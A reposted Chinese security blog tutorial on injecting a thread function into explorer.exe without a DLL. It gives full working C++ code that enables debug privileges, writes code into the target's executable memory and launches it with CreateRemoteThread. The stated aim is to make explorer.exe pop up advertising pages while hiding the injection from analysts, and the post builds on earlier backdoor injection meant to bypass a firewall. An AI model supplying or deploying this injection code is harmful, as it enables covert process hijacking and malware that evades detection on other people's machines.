安全之路 —— 无DLL文件实现远程线程注入

Posted peterz1997

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了安全之路 —— 无DLL文件实现远程线程注入相关的知识,希望对你有一定的参考价值。

简介

        在之前的章节中,笔者曾介绍过有关于远程线程注入的知识,将后门.dll文件注入explorer.exe中实现绕过防火墙反弹后门。但一个.exe文件总要在注入时捎上一个.dll文件着实是怪麻烦的,那么有没有什么方法能够不适用.dll文件实现注入呢?
        答案是有的,我们可以直接将功能写在线程函数中,然后直接将整个函数注入,这个方法相较之于DLL注入会稍微复杂一些,适用于对一些体积比较小的程序进行注入。但是要注意动态链接库的地址重定位问题,因为正常的文件一般会默认载入kernel32.dll文件,而不会载入其他DLL,且只有kernel32.dll与user32.dll文件可以保证在本地和目的进程中的加载地址是一样的,所以最好要在远程线程函数中手动利用LoadLibrary和GetProcessAddress函数强制加载一遍DLL文件。Visual Studio在编译此类功能的文件时建议关闭编译器的“/GS”选项,还要其他需要注意的地方可参考此链接
        下面我们借助此方法实现让Windows资源管理器explorer.exe实现弹网页(发广告)的功能,而分析人员却无法从程序依赖的动态链接库中找到我们注入线程用的DLL文件,达到了一定的隐藏效果。

代码实现

//////////////////////////////
//
// FileName : InjectProcess.cpp
// Creator : PeterZheng
// Date : 2018/8/18 0:35
// Comment : Inject Process Without Dll File
//
//////////////////////////////

#include <cstdio>
#include <cstdlib>
#include <iostream>
#include <string>
#include <string.h>
#include <windows.h>
#include <strsafe.h>
#include <tlhelp32.h>

#define MAX_LENGTH 50
#define NORMAL_LENGTH 20
#pragma warning(disable:4996)

using namespace std;

typedef struct _RemoteParam
{
    CHAR szOperation[NORMAL_LENGTH];
    CHAR szAddrerss[MAX_LENGTH];
    CHAR szLb[NORMAL_LENGTH];
    CHAR szFunc[NORMAL_LENGTH];
    LPVOID dwMLAAdress;
    LPVOID dwMGPAAddress;
    LPVOID dwSEAddress;
}RemoteParam;

DWORD WINAPI ThreadProc(RemoteParam *lprp)
{
    typedef HMODULE(WINAPI *MLoadLibraryA)(IN LPCTSTR lpFileName);
    typedef FARPROC(WINAPI *MGetProcAddress)(IN HMODULE hModule, IN LPCSTR lpProcName);
    typedef HINSTANCE(WINAPI *MShellExecuteA)(HWND hwnd, LPCSTR lpOperation, LPCSTR lpFile, LPCSTR lpParameters, LPCSTR lpDirectory, INT nShowCmd);
    MLoadLibraryA MLA;
    MGetProcAddress MGPA;
    MShellExecuteA MSE;
    MLA = (MLoadLibraryA)lprp->dwMLAAdress;
    MGPA = (MGetProcAddress)lprp->dwMGPAAddress;
    lprp->dwSEAddress = (LPVOID)MGPA(MLA(lprp->szLb), lprp->szFunc);
    MSE = (MShellExecuteA)lprp->dwSEAddress;
    MSE(NULL, lprp->szOperation, lprp->szAddrerss, NULL, NULL, SW_SHOWNORMAL);
    return 0;
}

DWORD GetProcessID(CHAR *ProcessName)
{
    PROCESSENTRY32 pe32;
    pe32.dwSize = sizeof(pe32);
    HANDLE hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hProcessSnap == INVALID_HANDLE_VALUE)
    {
        printf("CreateToolhelp32Snapshot error");
        return 0;
    }
    BOOL bProcess = Process32First(hProcessSnap, &pe32);
    while (bProcess)
    {
        if (strcmp(strupr(pe32.szExeFile), strupr(ProcessName)) == 0)
            return pe32.th32ProcessID;
        bProcess = Process32Next(hProcessSnap, &pe32);
    }
    CloseHandle(hProcessSnap);
    return 0;
}

int EnableDebugPriv(const TCHAR *name)
{
    HANDLE hToken;
    TOKEN_PRIVILEGES tp;
    LUID luid;
    if (!OpenProcessToken(GetCurrentProcess(),
        TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,
        &hToken))
    {
        printf("OpenProcessToken Error!
");
        return 1;
    }
    if (!LookupPrivilegeValue(NULL, name, &luid))
    {
        printf("LookupPrivilege Error!
");
        return 1;
    }
    tp.PrivilegeCount = 1;
    tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    tp.Privileges[0].Luid = luid;
    if (!AdjustTokenPrivileges(hToken, 0, &tp, sizeof(TOKEN_PRIVILEGES), NULL, NULL))
    {
        printf("AdjustTokenPrivileges Error!
");
        return 1;
    }
    return 0;
}

BOOL InjectProcess(const DWORD dwPid)
{
    if (EnableDebugPriv(SE_DEBUG_NAME)) return FALSE;
    HANDLE hWnd = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPid);
    if (!hWnd) return FALSE;
    RemoteParam rp;
    ZeroMemory(&rp, sizeof(RemoteParam));
    rp.dwMLAAdress = (LPVOID)GetProcAddress(LoadLibrary("Kernel32.dll"), "LoadLibraryA");
    rp.dwMGPAAddress = (LPVOID)GetProcAddress(LoadLibrary("Kernel32.dll"), "GetProcAddress");
    StringCchCopy(rp.szLb, sizeof(rp.szLb), "Shell32.dll");
    StringCchCopy(rp.szFunc, sizeof(rp.szFunc), "ShellExecuteA");
    StringCchCopy(rp.szAddrerss, sizeof(rp.szAddrerss), "https://www.baidu.com");
    StringCchCopy(rp.szOperation, sizeof(rp.szOperation), "open");
    RemoteParam *pRemoteParam = (RemoteParam *)VirtualAllocEx(hWnd, 0, sizeof(RemoteParam), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (!pRemoteParam) return FALSE;
    if (!WriteProcessMemory(hWnd, pRemoteParam, &rp, sizeof(RemoteParam), 0)) return FALSE;
    LPVOID pRemoteThread = VirtualAllocEx(hWnd, 0, 1024 * 4, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (!pRemoteThread) return FALSE;
    if (!WriteProcessMemory(hWnd, pRemoteThread, &ThreadProc, 1024 * 4, 0)) return FALSE;
    HANDLE hThread = CreateRemoteThread(hWnd, NULL, 0, (LPTHREAD_START_ROUTINE)pRemoteThread, (LPVOID)pRemoteParam, 0, NULL);
    if (!hThread) return FALSE;
    return TRUE;
}

int WINAPI WinMain(_In_ HINSTANCE hInstance, _In_opt_ HINSTANCE hPrevInstance, _In_ LPSTR lpCmdLine, _In_ int nShowCmd)
{
    CHAR szProcName[MAX_LENGTH] = "";
    StringCchCopy(szProcName, MAX_LENGTH, "explorer.exe");
    InjectProcess(GetProcessID(szProcName));
    ExitProcess(0);
    return 0;
}


以上是关于安全之路 —— 无DLL文件实现远程线程注入的主要内容,如果未能解决你的问题,请参考以下文章

JNA实现远程线程注入

远程线程DLL注入, 如何释放DLL和结束DLL的线程

vc 无dll的代码注入

远程线程注入代码

DLL注入和API拦截

[Re] 安全知识点